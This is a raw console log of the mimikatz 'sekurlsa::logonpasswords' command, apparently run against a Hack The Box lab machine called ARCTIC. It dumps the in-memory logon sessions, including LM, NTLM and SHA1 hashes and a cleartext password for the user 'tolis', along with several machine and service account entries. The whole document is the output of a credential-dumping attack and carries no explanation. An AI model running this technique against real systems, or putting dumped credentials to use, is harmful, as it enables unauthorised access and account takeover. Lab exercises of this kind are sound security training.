mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 79922 (00000000:00013832)
Session           : Service from 0
User Name         : tolis
Domain            : ARCTIC
Logon Server      : ARCTIC
Logon Time        : 18/5/2021 3:48:17 μμ
SID               : S-1-5-21-2913191377-1678605233-910955532-1000
        msv :
         [00000003] Primary
         * Username : tolis
         * Domain   : ARCTIC
         * LM       : 424613e7876699b7af089f05dd65c5be
         * NTLM     : 40ad7d34f236c2624bc826f671998a19
         * SHA1     : 852b011e5a1f99f389086291641a32c12f9b8577
        tspkg :
         * Username : tolis
         * Domain   : ARCTIC
         * Password : krjRUgtnI!
        wdigest :
         * Username : tolis
         * Domain   : ARCTIC
         * Password : krjRUgtnI!
        kerberos :
         * Username : tolis
         * Domain   : ARCTIC
         * Password : krjRUgtnI!
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : ARCTIC$
Domain            : HTB
Logon Server      : (null)
Logon Time        : 18/5/2021 3:48:17 μμ
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username : ARCTIC$
         * Domain   : HTB
         * Password : (null)
        kerberos :
         * Username : arctic$
         * Domain   : HTB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 18/5/2021 3:48:17 μμ
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 40311 (00000000:00009d77)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 18/5/2021 3:48:16 μμ
SID               :
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : ARCTIC$
Domain            : HTB
Logon Server      : (null)
Logon Time        : 18/5/2021 3:48:16 μμ
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : ARCTIC$
         * Domain   : HTB
         * Password : (null)
        kerberos :
         * Username : arctic$
         * Domain   : HTB
         * Password : (null)
        ssp :
        credman :